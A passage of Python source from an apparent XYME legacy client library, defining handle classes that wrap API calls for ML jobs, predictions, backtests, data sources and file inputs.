self._tabs: Optional[List[str]] = None
self._tickers: Optional[List[str]] = None
self._source: Optional[SourceHandle] = None
self._is_async_fetch = False
self._async_lock = threading.RLock()
def refresh(self) -> None:
self._name = None
self._path = None
self._schema_obj = None
self._kinds = None
self._permalink = None
self._time_total = None
self._time_start = None
self._time_end = None
self._time_estimate = None
self._buttons = None
self._can_rename = None
self._is_symjob = None
self._is_user_job = None
self._plot_order_types = None
self._tabs = None
self._tickers = None
self._source = None
if not self._is_async_fetch:
self._status = None
def _maybe_refresh(self) -> None:
if self._client.is_auto_refresh():
self.refresh()
def _fetch_info(self) -> None:
res = self._client._request_json(
METHOD_LONGPOST, "/status", {
"job": self._job_id,
}, capture_err=False)
if res.get("empty", True) and "name" not in res:
raise ValueError("could not update status")
info = cast(JobStatusInfo, res)
self._name = info["name"]
self._path = info["path"]
self._schema_obj = json.loads(info["schema"])
self._buttons = info["buttons"]
self._can_rename = info["canRename"]
self._is_symjob = info["symjob"]
self._is_user_job = info["isUserJob"]
self._kinds = info["allKinds"]
self._permalink = info["permalink"]
self._plot_order_types = info["plotOrderTypes"]
self._status = info["status"]
self._tabs = info["allTabs"]
self._tickers = info["tickers"]
self._time_total = info["timeTotal"]
self._time_start = info["timeStart"]
self._time_end = info["timeEnd"]
self._time_estimate = info["timeEstimate"]
def get_job_id(self) -> str:
return self._job_id
def get_schema(self) -> Dict[str, Any]:
self._maybe_refresh()
if self._schema_obj is None:
self._fetch_info()
assert self._schema_obj is not None
return copy.deepcopy(self._schema_obj)
def set_schema(self, schema: Dict[str, Any]) -> None:
res = cast(SchemaResponse, self._client._request_json(
METHOD_PUT, "/update_job_schema", {
"job": self._job_id,
"schema": json.dumps(schema),
}, capture_err=True))
self._schema_obj = json.loads(res["schema"])
@contextlib.contextmanager
def update_schema(self) -> Iterator[Dict[str, Any]]:
self._maybe_refresh()
if self._schema_obj is None:
self._fetch_info()
assert self._schema_obj is not None
yield self._schema_obj
self.set_schema(self._schema_obj)
@contextlib.contextmanager
def bulk_operation(self) -> Iterator[bool]:
with self._client.bulk_operation() as do_refresh:
if do_refresh:
self.refresh()
yield do_refresh
def get_notes(self, force: bool) -> Optional[NotesInfo]:
res = cast(PreviewNotesResponse, self._client._request_json(
METHOD_LONGPOST, "/preview", {
"job": self._job_id,
"view": "summary",
"force": force,
"schema": None,
"batch": None,
}, capture_err=False))
notes = res["notes"]
if notes is None:
return None
return {
"usage": notes.get("usage", {}),
"roles": notes.get("roles", {}),
"roles_renamed": notes.get("rolesRenamed", {}),
"dummy_columns": notes.get("dummyColumns", []),
"stats": notes.get("stats", {}),
"is_runnable": notes.get("isRunnable", False),
"suggestions": notes.get("suggestions", {}),
"is_preview": notes.get("isPreview", True),
"error": notes.get("error", True),
}
def can_start(self, force: bool) -> bool:
notes = self.get_notes(force)
# NOTE: notes is None if the job has been started
# this is a bug right now
if notes is None:
return True
return notes["is_runnable"] and not notes["error"]
def start(
self,
user: Optional[str] = None,
company: Optional[str] = None,
nowait: Optional[bool] = None) -> JobStartResponse:
if not self.can_start(force=False):
raise ValueError("Cannot start job. Missing data or target?")
res = self._client.start_job(
self._job_id, user=user, company=company, nowait=nowait)
self.refresh()
self._status = "waiting"
return res
def delete(self) -> None:
self._client._request_json(METHOD_DELETE, "/clean", {
"job": self._job_id,
}, capture_err=True)
self.refresh()
def get_name(self) -> str:
self._maybe_refresh()
if self._name is None:
self._fetch_info()
assert self._name is not None
return self._name
def get_path(self) -> str:
self._maybe_refresh()
if self._path is None:
self._fetch_info()
assert self._path is not None
return self._path
def get_status(self, fast_return: bool = True) -> str:
"""Returns the status of the job.
Args:
fast_return (bool): If set the function is non-blocking
and will fetch the current status in the background. The
function will return some previous status value and a future
call will eventually return the status returned by the call.
This guarantees that the function call does not block for a
long time for freshly started jobs. Defaults to True.
Returns:
str: The status of the job. Most common statuses are:
unknown, draft, waiting, running, killed, error, paused, done
"""
status = self._status
res: str = status if status is not None else "unknown"
def retrieve() -> None:
if self._client.is_auto_refresh() or self._status is None:
self.refresh()
self._status = res
self._fetch_info()
def async_retrieve() -> None:
retrieve()
self._is_async_fetch = False
if not fast_return:
retrieve()
status = self._status
assert status is not None
return status
if self._is_async_fetch:
return res
with self._async_lock:
if self._is_async_fetch:
return res
self._is_async_fetch = True
th = threading.Thread(target=async_retrieve)
th.start()
return res
def can_rename(self) -> bool:
self._maybe_refresh()
if self._can_rename is None:
self._fetch_info()
assert self._can_rename is not None
return self._can_rename
def is_symjob(self) -> bool:
self._maybe_refresh()
if self._is_symjob is None:
self._fetch_info()
assert self._is_symjob is not None
return self._is_symjob
def is_user_job(self) -> bool:
self._maybe_refresh()
if self._is_user_job is None:
self._fetch_info()
assert self._is_user_job is not None
return self._is_user_job
def is_paused(self) -> bool:
return self.get_status() == "paused"
def is_draft(self) -> bool:
return self.get_status() == "draft"
def get_permalink(self) -> str:
self._maybe_refresh()
if self._permalink is None:
self._fetch_info()
assert self._permalink is not None
return self._permalink
def get_tickers(self) -> List[str]:
self._maybe_refresh()
if self._tickers is None:
self._fetch_info()
assert self._tickers is not None
return list(self._tickers)
def set_name(self, name: str) -> None:
res = cast(JobRenameResponse, self._client._request_json(
METHOD_PUT, "/rename", {
"job": self._job_id,
"newJobName": name,
}, capture_err=True))
self._name = res["name"]
self._path = res["path"]
def set_pause(self, is_pause: bool) -> bool:
path = "/pause" if is_pause else "/unpause"
res = cast(JobPauseResponse, self._client._request_json(
METHOD_POST, path, {
"job": self._job_id,
}, capture_err=True))
return is_pause if res["success"] else not is_pause
def input_data(
self,
column: str,
ticker: Optional[str],
slow: bool = False) -> Any:
obj: Dict[str, Any] = {
"job": self._job_id,
"ticker": ticker,
"plot": column,
"allowCat": True,
"slow": slow,
}
return self._client._request_json(
METHOD_LONGPOST, "/input", obj, capture_err=False)
def feature_importance(
self,
method: str,
ticker: Optional[str],
date: Optional[str],
last_n: Optional[int],
agg_mode: Optional[str] = None) -> Any:
obj: Dict[str, Any] = {
"job": self._job_id,
"ticker": ticker,
"method": method,
"date": date,
"filters": {},
}
if agg_mode is not None:
obj["agg_mode"] = agg_mode
if last_n is not None:
obj["last_n"] = last_n
res = self._client._request_json(
METHOD_LONGPOST, "/explain", obj, capture_err=False)
return res
def dynamic_predict(
self,
method: str,
fbuff: Optional[IO[bytes]],
source: Optional['SourceHandle'],
) -> DynamicPredictionResponse:
if fbuff is not None:
res = cast(DynamicPredictionResponse, self._client._request_json(
METHOD_FILE, "/dynamic_predict", {
"job": self._job_id,
"method": method,
}, capture_err=True, files={"file": fbuff}))
elif source is not None:
if self._client.get_api_version() < 1:
raise ValueError("the XYME version does not "
"support dynamic predict sources")
res = cast(DynamicPredictionResponse, self._client._request_json(
METHOD_POST, "/dynamic_predict", {
"job": self._job_id,
"method": method,
"multiSourceId": source.get_source_id(),
}, capture_err=True))
else:
raise ValueError("one of fbuff or source must not be None")
return res
def predict_source(
self,
source: 'SourceHandle',
) -> Tuple[Optional[pd.DataFrame], StdoutWrapper]:
res = self.dynamic_predict("dyn_pred", fbuff=None, source=source)
return (
maybe_predictions_to_df(res["predictions"]),
StdoutWrapper(res["stdout"]),
)
def predict_proba_source(
self,
source: 'SourceHandle',
) -> Tuple[Optional[pd.DataFrame], StdoutWrapper]:
res = self.dynamic_predict("dyn_prob", fbuff=None, source=source)
return (
maybe_predictions_to_df(res["predictions"]),
StdoutWrapper(res["stdout"]),
)
def predict(
self,
df: pd.DataFrame,
) -> Tuple[Optional[pd.DataFrame], StdoutWrapper]:
buff = df_to_csv(df)
res = self.dynamic_predict("dyn_pred", fbuff=buff, source=None)
return (
maybe_predictions_to_df(res["predictions"]),
StdoutWrapper(res["stdout"]),
)
def predict_proba(
self,
df: pd.DataFrame,
) -> Tuple[Optional[pd.DataFrame], StdoutWrapper]:
buff = df_to_csv(df)
res = self.dynamic_predict("dyn_prob", fbuff=buff, source=None)
return (
maybe_predictions_to_df(res["predictions"]),
StdoutWrapper(res["stdout"]),
)
def predict_file(
self,
csv: str,
) -> Tuple[Optional[pd.DataFrame], StdoutWrapper]:
with open(csv, "rb") as f_in:
res = self.dynamic_predict("dyn_pred", fbuff=f_in, source=None)
return (
maybe_predictions_to_df(res["predictions"]),
StdoutWrapper(res["stdout"]),
)
def predict_proba_file(
self,
csv: str,
) -> Tuple[Optional[pd.DataFrame], StdoutWrapper]:
with open(csv, "rb") as f_in:
res = self.dynamic_predict("dyn_prob", fbuff=f_in, source=None)
return (
maybe_predictions_to_df(res["predictions"]),
StdoutWrapper(res["stdout"]),
)
def get_table(
self,
offset: int,
size: int,
reverse_order: bool) -> pd.DataFrame:
resp = self._client._request_bytes(
METHOD_POST, "/job_data", {
"job": self._job_id,
"format": "csv",
"offset": offset,
"size": size,
"reverse_order": reverse_order,
})
return pd.read_csv(resp)
def get_predictions_table(
self,
method: Optional[str],
offset: int,
size: int,
reverse_order: bool = False) -> Optional[pd.DataFrame]:
resp = self._client._request_bytes(
METHOD_GET, "/predictions", {
"job": self._job_id,
"format": "csv",
"method": method,
"last_n": size,
"offset": offset,
"reverse_order": reverse_order,
})
return pd.read_csv(resp)
def get_predictions(
self,
method: Optional[str],
ticker: Optional[str],
date: Optional[str],
last_n: int,
filters: Optional[Dict[str, Any]]) -> Optional[pd.DataFrame]:
if filters is None:
filters = {}
res = cast(SimplePredictionsResponse, self._client._request_json(
METHOD_LONGPOST, "/predictions", {
"job": self._job_id,
"method": method,
"ticker": ticker,
"date": date,
"last_n": last_n,
"filters": filters,
}, capture_err=False))
columns = res.get("columns", None)
predictions = res.get("predictions", None)
if columns is not None and predictions is not None:
return pd.DataFrame(predictions, columns=columns)
return None
def share(self, path: str) -> 'JobHandle':
shared = cast(ShareResponse, self._client._request_json(
METHOD_PUT, "/share", {
"job": self._job_id,
"with": path,
}, capture_err=True))
return JobHandle(
client=self._client,
job_id=shared["job"],
path=None,
name=None,
schema_obj=None,
kinds=None,
status=None,
permalink=None,
time_total=None,
time_start=None,
time_end=None,
time_estimate=None)
def create_source(
self,
source_type: str,
name: Optional[str] = None) -> 'SourceHandle':
res = self._client._raw_create_source(
source_type, name, self, None, None)
return res["source"]
def get_sources(self) -> List['SourceHandle']:
schema_obj = self.get_schema()
x_obj = schema_obj.get("X", {})
res = []
main_source_id = x_obj.get("source", None)
if main_source_id:
res.append(SourceHandle(
self._client, main_source_id, None, infer_type=True))
for progress in x_obj.get("source_progress", []):
cur_source_ix = progress.get("source", None)
if cur_source_ix:
res.append(SourceHandle(
self._client, cur_source_ix, None, infer_type=True))
return res
def get_fast_segments(self) -> List[
Tuple[Optional[pd.Timestamp], Optional[pd.Timestamp]]]:
schema_obj = self.get_schema()
x_obj = schema_obj.get("X", {})
res: List[Tuple[Optional[pd.Timestamp], Optional[pd.Timestamp]]] = \
[(None, None)]
res.extend((
maybe_timestamp(progress.get("start_time")),
maybe_timestamp(progress.get("end_time")),
) for progress in x_obj.get("source_progress", []))
return res
def get_segments(
self,
ticker: Optional[str] = None) -> List[Tuple[
int, Optional[pd.Timestamp], Optional[pd.Timestamp]]]:
res = cast(SegmentResponse, self._client._request_json(
METHOD_LONGPOST, "/segments", {
"job": self._job_id,
"ticker": ticker,
}, capture_err=False))
return [
(rows, maybe_timestamp(start_time), maybe_timestamp(end_time))
for (rows, start_time, end_time) in res.get("segments", [])
]
def get_main_source(self, ticker: Optional[str] = None) -> 'SourceHandle':
self._maybe_refresh()
if self._source is not None:
return self._source
res = cast(SourceResponse, self._client._request_json(
METHOD_GET, "/job_source", {
"job": self._job_id,
"ticker": ticker,
}, capture_err=True))
self._source = SourceHandle(
self._client, res["sourceId"], None, infer_type=True)
return self._source
def set_main_source(self, source: 'SourceHandle') -> None:
with self.update_schema() as obj:
x_obj = obj.get("X", {})
x_obj["source"] = source.get_source_id()
obj["X"] = x_obj
def append_source(
self,
source: 'SourceHandle',
start_time: Optional[Union[str, pd.Timestamp]],
end_time: Optional[Union[str, pd.Timestamp]],
change_set: Optional[Dict[str, Any]] = None) -> None:
with self.update_schema() as obj:
x_obj = obj.get("X", {})
progress = x_obj.get("source_progress", [])
progress.append({
"source": source.get_source_id(),
"start_time": None if start_time is None else f"{start_time}",
"end_time": None if end_time is None else f"{end_time}",
"change_set": {} if change_set is None else change_set,
})
x_obj["source_progress"] = progress
obj["X"] = x_obj
def inspect(self, ticker: Optional[str]) -> 'InspectHandle':
return InspectHandle(self._client, self, ticker)
def get_metrics(self, kind: str = PLOT_PKL) -> MetricListInfo:
res = cast(MetricListResponse, self._client._request_json(
METHOD_LONGPOST, "/metric_plots", {
"job": self._job_id,
"kind": kind,
}, capture_err=False))
return {
"metrics": res["metrics"],
"selected_plots": res["selectedPlots"],
"hidden_plots": res["hiddenPlots"],
}
def get_data_plots(self) -> DataPlotListInfo:
res = cast(DataPlotListResponse, self._client._request_json(
METHOD_LONGPOST, "/data_plots", {
"job": self._job_id,
}, capture_err=False))
return {
"data_plots": res["dataPlots"],
"selected_plots": res["selectedPlots"],
"hidden_plots": res["hiddenPlots"],
}
def select_plots(
self,
plots: List[List[str]],
plot_type: str) -> List[List[str]]:
res = cast(SelectPlotsResponse, self._client._request_json(
METHOD_PUT, "/select_plots", {
"job": self._job_id,
"selectedPlots": plots,
"type": plot_type,
}, capture_err=False))
return res["selectedPlots"]
def hide_plot(self, plot: List[str], plot_type: str, hide: bool) -> bool:
return cast(HidePlotResponse, self._client._request_json(
METHOD_PUT, "/hide_plot", {
"hide": hide,
"job": self._job_id,
"plot": plot,
"type": plot_type,
}, capture_err=True)).get("success", False)
def get_metric(
self,
metric: str,
ticker: Optional[str],
kind: str = PLOT_PKL) -> Optional[MetricWrapper]:
res = cast(MetricResponse, self._client._request_json(
METHOD_LONGPOST, "/metric", {
"job": self._job_id,
"kind": kind,
"metric": metric,
"ticker": ticker,
}, capture_err=False))
plot = res["lines"]
if not plot:
return None
if plot["kind"] == "time":
return MetricPlot(plot)
if plot["kind"] == "coord":
return MetricCoords(plot)
raise ValueError(f"invalid plot kind: {plot['kind']}")
def _raw_stdout(
self,
ticker: Optional[str],
do_filter: bool,
query_str: Optional[str],
pos: Optional[int],
context: int,
before: Optional[int],
after: Optional[int]) -> List[StdoutLine]:
res = cast(JobStdoutResponse, self._client._request_json(
METHOD_POST, "/stdout", {
"job": self._job_id,
"ticker": ticker,
"filter": do_filter,
"query": query_str,
"pos": pos,
"context": context,
"before": before,
"after": after,
}, capture_err=False))
return res["lines"]
def get_logs(self) -> StdoutWrapper:
return StdoutWrapper({
"lines": self._raw_stdout(None, False, None, None, 0, None, None),
"messages": {},
"exceptions": [],
})
def get_summary(self, ticker: Optional[str]) -> SummaryInfo:
res = cast(SummaryResponse, self._client._request_json(
METHOD_LONGPOST, "/summary", {
"job": self._job_id,
"ticker": ticker,
}, capture_err=False))
messages = res.get("messages")
exceptions = res.get("exceptions")
stdout = StdoutWrapper({
"messages": {} if messages is None else messages,
"exceptions": [] if exceptions is None else exceptions,
"lines": [],
})
data_start = res.get("dataStart")
data_high = res.get("dataHigh")
data_end = res.get("dataEnd")
return {
"stdout": stdout,
"last_event": res.get("lastEvent"),
"rows": res.get("rows"),
"rows_total": res.get("rowsTotal"),
"features": res.get("features"),
"dropped_features": res.get("droppedFeatures"),
"data_start": maybe_timestamp(data_start),
"data_high": maybe_timestamp(data_high),
"data_end": maybe_timestamp(data_end),
}
def get_backtest(
self,
strategy: Optional[str],
base_strategy: Optional[str],
price_source: Optional['SourceHandle'],
prediction_feature: Optional[str],
ticker: Optional[str] = None,
) -> Tuple[Optional[Dict[str, Any]], StdoutWrapper]:
res = cast(BacktestResponse, self._client._request_json(
METHOD_LONGPOST, "/summary", {
"job": self._job_id,
"ticker": ticker,
"predictionFeature": prediction_feature,
"strategy": strategy,
"baseStrategy": base_strategy,
"priceSourceId": price_source,
}, capture_err=False))
output = res.get("output", [])
stdout = StdoutWrapper({
"lines": output if output is not None else [],
"messages": {},
"exceptions": [],
})
if res.get("errMessage", None):
raise ValueError(res["errMessage"], stdout)
return res.get("pyfolio", None), stdout
def get_columns(self, ticker: Optional[str]) -> List[str]:
res = cast(JobColumnsResponse, self._client._request_json(
METHOD_POST, "/job_columns", {
"job": self._job_id,
"ticker": ticker,
}, capture_err=True))
return res["columns"]
def get_data(
self, ticker: Optional[str], columns: List[str]) -> pd.DataFrame:
resp = self._client._request_bytes(
METHOD_POST, "/job_data", {
"job": self._job_id,
"ticker": ticker,
"columns": columns,
"format": "csv",
})
return pd.read_csv(resp)
def force_flush(self) -> None:
res = cast(ForceFlushResponse, self._client._request_json(
METHOD_PUT, "/force_flush", {
"job": self._job_id,
}, capture_err=False))
if not res["success"]:
raise AccessDenied(f"cannot access job {self._job_id}")
self.refresh()
def create_backup(self) -> 'JobHandle':
res = cast(JobBackupResponse, self._client._request_json(
METHOD_LONGPOST, "/backup_job", {
"job": self._job_id,
}, capture_err=True))
return JobHandle(
client=self._client,
job_id=res["jobId"],
path=None,
name=None,
schema_obj=None,
kinds=None,
status=None,
permalink=None,
time_total=None,
time_start=None,
time_end=None,
time_estimate=None)
def __repr__(self) -> str:
name = ""
if self._name is not None:
name = f" ({self._name})"
return f"{type(self).__name__}: {self._job_id}{name}"
def __str__(self) -> str:
return repr(self)
# *** JobHandle ***
InspectValue = Union['InspectPath', bool, int, float, str, None]
class InspectPath(collections.abc.Mapping):
def __init__(
self,
clazz: str,
inspect: 'InspectHandle',
path: List[str],
summary: str):
self._clazz = clazz
self._inspect = inspect
self._path = path
self._cache: Dict[str, InspectValue] = {}
self._key_cache: Optional[Set[str]] = None
self._summary = summary
def refresh(self) -> None:
self._cache = {}
def get_clazz(self) -> str:
return self._clazz
def has_cached_value(self, key: str) -> bool:
return key in self._cache
def _set_cache(self, key: str, value: InspectValue) -> None:
self._cache[key] = value
def _set_key_cache(self, keys: Iterable[str]) -> None:
self._key_cache = set(keys)
def __getitem__(self, key: str) -> InspectValue:
# pylint: disable=unsupported-membership-test
if self._key_cache is not None and key not in self._key_cache:
raise KeyError(key)
if not self.has_cached_value(key):
self._cache[key] = self._inspect.get_value_for_path(
self._path + [key])
return self._cache[key]
def _ensure_key_cache(self) -> None:
if self._key_cache is not None:
return
self._key_cache = set()
def __iter__(self) -> Iterator[str]:
self._ensure_key_cache()
assert self._key_cache is not None
return iter(self._key_cache)
def __len__(self) -> int:
self._ensure_key_cache()
assert self._key_cache is not None
return len(self._key_cache)
def __repr__(self) -> str:
res = f"{self._clazz}: {{"
first = True
for key in self:
if first:
first = False
else:
res += ", "
res += repr(key)
res += ": "
if self.has_cached_value(key):
res += repr(self[key])
else:
res += "..."
return f"{res}}}"
def __str__(self) -> str:
return f"{self._clazz}: {self._summary}"
# *** InspectPath ***
class InspectHandle(InspectPath):
def __init__(
self,
client: XYMELegacyClient,
job: JobHandle,
ticker: Optional[str]) -> None:
super().__init__("uninitialized", self, [], "uninitialized")
self._client = client
self._job_id = job._job_id
self._ticker = ticker
init = self._query([])
if init is not None:
self._clazz = init["clazz"]
self._summary = init["extra"]
values = init["value"]
if isinstance(values, list):
self._set_key_cache((name for (name, _) in values))
def _query(self, path: List[str]) -> Optional[InspectItem]:
query: InspectQuery = {"state": {}}
assert query is not None
subq = query["state"]
for seg in path:
assert subq is not None
subq[seg] = {}
subq = subq[seg]
res = cast(InspectResponse, self._client._request_json(
METHOD_LONGPOST, "/inspect", {
"job": self._job_id,
"query": query,
"ticker": self._ticker,
}, capture_err=False))
return res["inspect"]
def get_value_for_path(self, path: List[str]) -> InspectValue:
res: InspectValue = self
do_query = False
for seg in path:
if not isinstance(res, InspectPath):
raise TypeError(f"cannot query {seg} on {res}")
if res.has_cached_value(seg):
res = res[seg]
continue
do_query = True
break
def maybe_set_cache(
key: str,
ipath: InspectPath,
obj: InspectItem) -> Optional[InspectPath]:
has_value = False
res = None
if obj["leaf"]:
if obj["clazz"] == "None":
val: InspectValue = None
elif obj["clazz"] == "bool":
val = bool(obj["value"])
elif obj["clazz"] == "int":
if obj["value"] is None:
raise TypeError(f"did not expect None: {obj}")
if isinstance(obj["value"], list):
raise TypeError(f"did not expect list: {obj}")
val = int(obj["value"])
elif obj["clazz"] == "float":
if obj["value"] is None:
raise TypeError(f"did not expect None: {obj}")
if isinstance(obj["value"], list):
raise TypeError(f"did not expect list: {obj}")
val = float(obj["value"])
elif obj["clazz"] == "str":
val = str(obj["value"])
else:
if isinstance(obj["value"], list):
raise TypeError(f"did not expect list: {obj}")
val = obj["value"]
has_value = True
elif not obj["collapsed"]:
res = InspectPath(
obj["clazz"], self, list(upto), obj["extra"])
val = res
values = obj["value"]
if not isinstance(values, list):
raise TypeError(f"expected list got: {values}")
keys = []
for (name, cur) in values:
keys.append(name)
maybe_set_cache(name, val, cur)
val._set_key_cache(keys)
has_value = True
if has_value:
ipath._set_cache(key, val)
return res
if do_query:
obj = self._query(path)
res = self
upto = []
for seg in path:
upto.append(seg)
if obj is None:
raise KeyError(seg)
if obj["leaf"]:
raise ValueError(f"early leaf node at {seg}")
next_obj: Optional[InspectItem] = None
values = obj["value"]
if not isinstance(values, list):
raise TypeError(f"expected list got: {values}")
for (name, value) in values:
if name == seg:
next_obj = value
break
if next_obj is None:
raise KeyError(seg)
obj = next_obj
if not isinstance(res, InspectPath):
raise TypeError(f"cannot query {seg} on {res}")
if res.has_cached_value(seg):
res = res[seg]
else:
ipath = maybe_set_cache(seg, res, obj)
assert ipath is not None
res = ipath
return res
# *** InspectHandle ***
class SourceHandle:
def __init__(
self,
client: XYMELegacyClient,
source_id: str,
source_type: Optional[str],
infer_type: bool = False,
name: Optional[str] = None,
immutable: Optional[bool] = None,
help_message: Optional[str] = None):
if not source_id:
raise ValueError("source id is not set!")
if not infer_type and (
not source_type or source_type not in ALL_SOURCE_TYPES):
raise ValueError(f"invalid source type: {source_type}")
self._client = client
self._source_id = source_id
self._source_type = source_type
self._name = name
self._immutable = immutable
self._help = help_message
self._schema_obj: Optional[Dict[str, Any]] = None
self._dirty: Optional[bool] = None
def refresh(self) -> None:
self._schema_obj = None
self._dirty = None
self._immutable = None
self._name = None
self._help = None
def _maybe_refresh(self) -> None:
if self._client.is_auto_refresh():
self.refresh()
def _fetch_info(self) -> None:
res = cast(SourceSchemaResponse, self._client._request_json(
METHOD_GET, "/source_schema", {
"sourceId": self._source_id,
}, capture_err=True))
self._schema_obj = res["sourceSchema"]
info = res["sourceInfo"]
self._dirty = info["dirty"]
self._immutable = info["immutable"]
self._name = info["sourceName"]
self._source_type = info["sourceType"]
def _ensure_multi_source(self) -> None:
if not self.is_multi_source():
raise ValueError("can only add source to multi source")
def _ensure_csv_source(self) -> None:
if not self.is_csv_source():
raise ValueError("can only set input for csv source")
def get_schema(self) -> Dict[str, Any]:
self._maybe_refresh()
if self._schema_obj is None:
self._fetch_info()
assert self._schema_obj is not None
return copy.deepcopy(self._schema_obj)
def set_schema(self, schema: Dict[str, Any]) -> None:
res = cast(SchemaResponse, self._client._request_json(
METHOD_PUT, "/source_schema", {
"sourceId": self._source_id,
"schema": json.dumps(schema),
}, capture_err=True))
schema_obj = json.loads(res["schema"])
self._schema_obj = schema_obj
# NOTE: we can infer information about
# the source by being able to change it
self._name = schema_obj.get("name", self._source_id)
self._source_type = schema_obj.get("type")
self._help = schema_obj.get("help", "")
self._dirty = True
self._immutable = False
def get_name(self) -> str:
self._maybe_refresh()
if self._name is None:
self._fetch_info()
assert self._name is not None
return self._name
def get_help_message(self) -> str:
self._maybe_refresh()
if self._help is None:
self._fetch_info()
assert self._help is not None
return self._help
@contextlib.contextmanager
def bulk_operation(self) -> Iterator[bool]:
with self._client.bulk_operation() as do_refresh:
if do_refresh:
self.refresh()
yield do_refresh
@contextlib.contextmanager
def update_schema(self) -> Iterator[Dict[str, Any]]:
self._maybe_refresh()
if self._schema_obj is None:
self._fetch_info()
assert self._schema_obj is not None
yield self._schema_obj
self.set_schema(self._schema_obj)
def is_dirty(self) -> bool:
self._maybe_refresh()
if self._dirty is None:
self._fetch_info()
assert self._dirty is not None
return self._dirty
def is_immutable(self) -> bool:
self._maybe_refresh()
if self._immutable is None:
self._fetch_info()
assert self._immutable is not None
return self._immutable
def get_source_id(self) -> str:
return self._source_id
def get_source_type(self) -> str:
# NOTE: we don't refresh source type frequently
if self._source_type is None:
self._fetch_info()
assert self._source_type is not None
return self._source_type
def is_multi_source(self) -> bool:
return self.get_source_type() == SOURCE_TYPE_MULTI
def is_csv_source(self) -> bool:
return self.get_source_type() == SOURCE_TYPE_CSV
def set_immutable(self, is_immutable: bool) -> 'SourceHandle':
res = self._client.set_immutable_raw(self, None, None, is_immutable)
return res["new_source"]
def flip_immutable(self) -> 'SourceHandle':
res = self._client.set_immutable_raw(self, None, None, None)
return res["new_source"]
def add_new_source(self,
source_type: str,
name: Optional[str] = None) -> 'SourceHandle':
self._ensure_multi_source()
res = self._client._raw_create_source(
source_type, name, None, self, None)
self.refresh()
return res["source"]
def add_new_source_file(
self,
filename: str,
ticker_column: str,
date_column: Optional[str],
progress_bar: Optional[IO[Any]] = sys.stdout,
) -> 'SourceHandle':
with self.bulk_operation():
source = self.add_new_source(
SOURCE_TYPE_CSV, os.path.basename(filename))
source.set_input_file(
filename, ticker_column, date_column, progress_bar)
return source
def add_new_source_df(
self,
df: pd.DataFrame,
name: str,
ticker_column: str,
date_column: Optional[str],
progress_bar: Optional[IO[Any]] = sys.stdout,
) -> 'SourceHandle':
with self.bulk_operation():
source = self.add_new_source(SOURCE_TYPE_CSV, name)
source.set_input_df(
df, name, ticker_column, date_column, progress_bar)
return source
def add_source(self, source: 'SourceHandle') -> None:
with self.bulk_operation():
self._ensure_multi_source()
with self.update_schema() as schema_obj:
if "config" not in schema_obj:
schema_obj["config"] = {}
config = schema_obj["config"]
if "sources" not in config:
config["sources"] = []
config["sources"].append(source.get_source_id())
def set_input(
self,
input_obj: 'InputHandle',
ticker_column: Optional[str],
date_column: Optional[str]) -> None:
with self.bulk_operation():
self._ensure_csv_source()
with self.update_schema() as schema_obj:
with input_obj.bulk_operation():
if "config" not in schema_obj:
schema_obj["config"] = {}
config = schema_obj["config"]
ext = input_obj.get_extension()
if ext is None:
ext = "csv" # should be correct in 99% of the cases
config["filename"] = f"{input_obj.get_input_id()}.{ext}"
if ticker_column is not None:
config["ticker"] = ticker_column
if date_column is not None:
config["date"] = date_column
def set_input_file(
self,
filename: str,
ticker_column: str,
date_column: Optional[str],
progress_bar: Optional[IO[Any]] = sys.stdout) -> None:
with self.bulk_operation():
self._ensure_csv_source()
input_obj = self._client.input_from_file(filename, progress_bar)
self.set_input(input_obj, ticker_column, date_column)
def set_input_df(
self,
df: pd.DataFrame,
name: str,
ticker_column: str,
date_column: Optional[str],
progress_bar: Optional[IO[Any]] = sys.stdout) -> None:
with self.bulk_operation():
self._ensure_csv_source()
input_obj = self._client.input_from_df(df, name, progress_bar)
self.set_input(input_obj, ticker_column, date_column)
def get_sources(self) -> Iterable['SourceHandle']:
with self.bulk_operation():
self._ensure_multi_source()
if self._schema_obj is None:
self._fetch_info()
assert self._schema_obj is not None
sources = self._schema_obj.get("config", {}).get("sources", [])
for source_id in sources:
yield SourceHandle(
self._client, source_id, None, infer_type=True)
def get_input(self) -> Optional['InputHandle']:
with self.bulk_operation():
self._ensure_csv_source()
if self._schema_obj is None:
self._fetch_info()
assert self._schema_obj is not None
fname = self._schema_obj.get("config", {}).get("filename", None)
if fname is None:
return None
dot = fname.find(".")
input_id = fname[:dot] if dot >= 0 else fname
return InputHandle(self._client, input_id)
def __repr__(self) -> str:
name = ""
if self._name is not None:
name = f" ({self._name})"
return f"{type(self).__name__}: {self._source_id}{name}"
def __str__(self) -> str:
return repr(self)
# *** SourceHandle ***
class InputHandle:
def __init__(
self,
client: XYMELegacyClient,
input_id: str,
name: Optional[str] = None,
path: Optional[str] = None,
ext: Optional[str] = None,
size: Optional[int] = None,
progress: Optional[str] = None) -> None:
if not input_id:
raise ValueError("input id is not set!")
self._client = client
self._input_id = input_id
self._name = name
self._ext = ext
self._size = size
self._path = path
self._progress = progress
self._last_byte_offset: Optional[int] = None
def refresh(self) -> None:
self._name = None
self._path = None
self._ext = None
self._progress = None
self._last_byte_offset = None
self._size = None
def _maybe_refresh(self) -> None:
if self._client.is_auto_refresh():
self.refresh()
def _fetch_info(self) -> None:
res = cast(InputDetailsResponse, self._client._request_json(
METHOD_GET, "/input_details", {
"inputId": self._input_id,
}, capture_err=False))
self._input_id = res["inputId"]
self._name = res["name"]
self._path = res["path"]
self._ext = res["extension"]
self._last_byte_offset = res["lastByteOffset"]
self._size = res["size"]
self._progress = res["progress"]
if self._progress is None:
self._progress = "unknown"
def get_input_id(self) -> str:
return self._input_id
def get_name(self) -> Optional[str]:
self._maybe_refresh()
if self._name is None:
self._fetch_info()
return self._name
def get_path(self) -> str:
self._maybe_refresh()
if self._path is None:
self._fetch_info()
assert self._path is not None
return self._path
def get_extension(self) -> Optional[str]:
self._maybe_refresh()
if self._ext is None:
self._fetch_info()
return self._ext
def get_last_byte_offset(self) -> Optional[int]:
self._maybe_refresh()
if self._last_byte_offset is None:
self._fetch_info()
return self._last_byte_offset
def get_size(self) -> Optional[int]:
self._maybe_refresh()
if self._size is None:
self._fetch_info()
return self._size
def get_progress(self) -> str:
self._maybe_refresh()
if self._progress is None:
self._fetch_info()
assert self._progress is not None
return self._progress
def is_complete(self) -> bool:
return self.get_progress() == UPLOAD_DONE
@contextlib.contextmanager
def bulk_operation(self) -> Iterator[bool]:
with self._client.bulk_operation() as do_refresh:
if do_refresh:
self.refresh()
yield do_refresh
def upload_partial(self, chunk_content: IO[bytes]) -> bool:
if self._last_byte_offset is None or self._name is None:
self._fetch_info()
if self._last_byte_offset is None:
